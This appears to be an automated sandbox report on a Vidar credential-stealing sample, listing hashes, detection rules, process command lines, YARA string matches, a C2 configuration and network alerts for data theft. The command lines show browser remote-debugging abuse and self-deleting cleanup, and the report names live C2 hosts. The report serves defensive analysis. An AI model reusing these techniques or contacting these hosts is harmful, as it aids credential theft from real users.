Edit tour

Windows Analysis Report
dwpk5JGAxF.exe

Overview

General Information

Sample name:	dwpk5JGAxF.exe renamed because original name is a hash value
Original sample name:	1684e9b9f85aaf93d1a90063d386b67f.exe
Analysis ID:	1624336
MD5:	1684e9b9f85aaf93d1a90063d386b67f
SHA1:	4ee1fb056218b85f39cd3a35c702aebf00d78f25
SHA256:	3d4a254a1e3f1774d188d81c22f4db19d0cd3d6b47eb034ecfcd15a5667a45a0
Tags:	exeuser-abuse_ch
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Monitors registry run keys for changes

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

dwpk5JGAxF.exe (PID: 764 cmdline: "C:\Users\user\Desktop\dwpk5JGAxF.exe" MD5: 1684E9B9F85AAF93D1A90063D386B67F)

BitLockerToGo.exe (PID: 5448 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

chrome.exe (PID: 7108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2316,i,9256415067859911694,5598517389799646016,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 7516 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7824 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1608 --field-trial-handle=2480,i,11077060698317799847,3901179626067263456,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cmd.exe (PID: 5476 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\iect2" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 5932 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

msedge.exe (PID: 7736 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8092 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2020,i,68058658030323633,9361160109532157268,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 1912 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6728 --field-trial-handle=2020,i,68058658030323633,9361160109532157268,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3344 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7176 --field-trial-handle=2020,i,68058658030323633,9361160109532157268,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5488 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7136 --field-trial-handle=2020,i,68058658030323633,9361160109532157268,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199828130190", "Botnet": "ot0yikam"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1823395931.000000000A700000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1823395931.000000000A700000.00000004.00001000.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
00000000.00000002.1823913498.000000000A816000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000003.1714504161.000000000A816000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000002.1823395931.000000000A680000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1823395931.000000000A680000.00000004.00001000.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
00000000.00000002.1823395931.000000000A6E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1823395931.000000000A6E0000.00000004.00001000.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
00000000.00000002.1824125509.000000000A900000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000002.1823395931.000000000A740000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1823395931.000000000A740000.00000004.00001000.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
00000003.00000003.1893504632.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2314231363.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2314231363.0000000000400000.00000040.00000400.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x1ad7f:$str01: MachineID: 0x19d4f:$str02: Work Dir: In memory 0x1ae27:$str03: [Hardware] 0x1ad68:$str04: VideoCard: 0x1a4c0:$str05: [Processes] 0x1a4cc:$str06: [Software] 0x19de0:$str07: information.txt 0x1aabc:$str08: %s\* 0x1ab09:$str08: %s\* 0x19ffd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x1a392:$str12: UseMasterPassword 0x1ae33:$str13: Soft: WinSCP 0x1a86b:$str14: <Pass encoding="base64"> 0x1ae16:$str15: Soft: FileZilla 0x19dd2:$str16: passwords.txt 0x1a3bd:$str17: build_id 0x1a484:$str18: file_data
00000000.00000002.1823395931.000000000A720000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1823395931.000000000A720000.00000004.00001000.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
Process Memory Space: dwpk5JGAxF.exe PID: 764	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 5448	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 5448	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.dwpk5JGAxF.exe.a680000.2.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x1917f:$str01: MachineID: 0x19227:$str03: [Hardware] 0x19168:$str04: VideoCard: 0x188c0:$str05: [Processes] 0x188cc:$str06: [Software] 0x18ebc:$str08: %s\* 0x18f09:$str08: %s\* 0x183fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x18792:$str12: UseMasterPassword 0x19233:$str13: Soft: WinSCP 0x18c6b:$str14: <Pass encoding="base64"> 0x19216:$str15: Soft: FileZilla 0x187bd:$str17: build_id 0x18884:$str18: file_data
0.2.dwpk5JGAxF.exe.a700000.1.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x1917f:$str01: MachineID: 0x19227:$str03: [Hardware] 0x19168:$str04: VideoCard: 0x188c0:$str05: [Processes] 0x188cc:$str06: [Software] 0x18ebc:$str08: %s\* 0x18f09:$str08: %s\* 0x183fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x18792:$str12: UseMasterPassword 0x19233:$str13: Soft: WinSCP 0x18c6b:$str14: <Pass encoding="base64"> 0x19216:$str15: Soft: FileZilla 0x187bd:$str17: build_id 0x18884:$str18: file_data
3.2.BitLockerToGo.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.BitLockerToGo.exe.400000.0.raw.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x1ad7f:$str01: MachineID: 0x19d4f:$str02: Work Dir: In memory 0x1ae27:$str03: [Hardware] 0x1ad68:$str04: VideoCard: 0x1a4c0:$str05: [Processes] 0x1a4cc:$str06: [Software] 0x19de0:$str07: information.txt 0x1aabc:$str08: %s\* 0x1ab09:$str08: %s\* 0x19ffd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x1a392:$str12: UseMasterPassword 0x1ae33:$str13: Soft: WinSCP 0x1a86b:$str14: <Pass encoding="base64"> 0x1ae16:$str15: Soft: FileZilla 0x19dd2:$str16: passwords.txt 0x1a3bd:$str17: build_id 0x1a484:$str18: file_data
0.2.dwpk5JGAxF.exe.a720000.5.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.dwpk5JGAxF.exe.a720000.5.raw.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
0.2.dwpk5JGAxF.exe.a740000.4.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.dwpk5JGAxF.exe.a740000.4.raw.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
0.2.dwpk5JGAxF.exe.a680000.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.dwpk5JGAxF.exe.a680000.2.raw.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
3.2.BitLockerToGo.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.BitLockerToGo.exe.400000.0.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
0.2.dwpk5JGAxF.exe.a6e0000.3.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x1917f:$str01: MachineID: 0x19227:$str03: [Hardware] 0x19168:$str04: VideoCard: 0x188c0:$str05: [Processes] 0x188cc:$str06: [Software] 0x18ebc:$str08: %s\* 0x18f09:$str08: %s\* 0x183fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x18792:$str12: UseMasterPassword 0x19233:$str13: Soft: WinSCP 0x18c6b:$str14: <Pass encoding="base64"> 0x19216:$str15: Soft: FileZilla 0x187bd:$str17: build_id 0x18884:$str18: file_data
0.2.dwpk5JGAxF.exe.a700000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.dwpk5JGAxF.exe.a700000.1.raw.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
0.2.dwpk5JGAxF.exe.a740000.4.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x1917f:$str01: MachineID: 0x19227:$str03: [Hardware] 0x19168:$str04: VideoCard: 0x188c0:$str05: [Processes] 0x188cc:$str06: [Software] 0x18ebc:$str08: %s\* 0x18f09:$str08: %s\* 0x183fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x18792:$str12: UseMasterPassword 0x19233:$str13: Soft: WinSCP 0x18c6b:$str14: <Pass encoding="base64"> 0x19216:$str15: Soft: FileZilla 0x187bd:$str17: build_id 0x18884:$str18: file_data
0.2.dwpk5JGAxF.exe.a720000.5.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x1917f:$str01: MachineID: 0x19227:$str03: [Hardware] 0x19168:$str04: VideoCard: 0x188c0:$str05: [Processes] 0x188cc:$str06: [Software] 0x18ebc:$str08: %s\* 0x18f09:$str08: %s\* 0x183fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x18792:$str12: UseMasterPassword 0x19233:$str13: Soft: WinSCP 0x18c6b:$str14: <Pass encoding="base64"> 0x19216:$str15: Soft: FileZilla 0x187bd:$str17: build_id 0x18884:$str18: file_data
0.2.dwpk5JGAxF.exe.a6e0000.3.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.dwpk5JGAxF.exe.a6e0000.3.raw.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
Click to see the 14 entries

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 5448, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7108, ProcessName: chrome.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-26T08:11:02.830755+0100	2044247	1	Malware Command and Control Activity Detected	94.130.190.206	443	192.168.2.8	49711	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-26T08:11:04.338441+0100	2051831	1	Malware Command and Control Activity Detected	94.130.190.206	443	192.168.2.8	49712	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-26T08:11:01.504690+0100	2049087	1	A Network Trojan was detected	192.168.2.8	49710	94.130.190.206	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-26T08:11:05.692375+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49713	94.130.190.206	443	TCP
2025-02-26T08:11:06.910856+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49714	94.130.190.206	443	TCP
2025-02-26T08:11:15.015682+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49736	94.130.190.206	443	TCP
2025-02-26T08:11:15.392036+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49739	94.130.190.206	443	TCP
2025-02-26T08:11:16.404653+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49741	94.130.190.206	443	TCP
2025-02-26T08:11:17.483797+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49742	94.130.190.206	443	TCP
2025-02-26T08:11:19.247734+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49743	94.130.190.206	443	TCP
2025-02-26T08:11:25.232341+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49758	94.130.190.206	443	TCP
2025-02-26T08:11:25.792495+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49773	94.130.190.206	443	TCP
2025-02-26T08:11:27.249513+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49776	94.130.190.206	443	TCP
2025-02-26T08:11:28.170605+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49787	94.130.190.206	443	TCP
2025-02-26T08:11:29.499098+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49806	94.130.190.206	443	TCP
2025-02-26T08:11:30.740662+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49834	94.130.190.206	443	TCP
2025-02-26T08:11:32.785297+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49844	94.130.190.206	443	TCP
2025-02-26T08:11:37.515859+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49860	94.130.190.206	443	TCP
2025-02-26T08:11:41.014497+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49887	94.130.190.206	443	TCP

ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-26T08:11:15.392036+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49739	94.130.190.206	443	TCP
2025-02-26T08:11:16.404653+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49741	94.130.190.206	443	TCP
2025-02-26T08:11:17.483797+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49742	94.130.190.206	443	TCP
2025-02-26T08:11:25.792495+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49773	94.130.190.206	443	TCP
2025-02-26T08:11:27.249513+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49776	94.130.190.206	443	TCP
2025-02-26T08:11:28.170605+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49787	94.130.190.206	443	TCP
2025-02-26T08:11:29.499098+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49806	94.130.190.206	443	TCP
2025-02-26T08:11:30.740662+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49834	94.130.190.206	443	TCP
2025-02-26T08:11:32.785297+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49844	94.130.190.206	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-26T08:11:00.176510+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.8	49709	94.130.190.206	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://fua.4t.com/

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1823395931.000000000A700000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199828130190", "Botnet": "ot0yikam"}

Multi AV Scanner detection for submitted file

Source: dwpk5JGAxF.exe	Virustotal: Detection: 18%			Perma Link
Source: dwpk5JGAxF.exe	ReversingLabs: Detection: 44%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

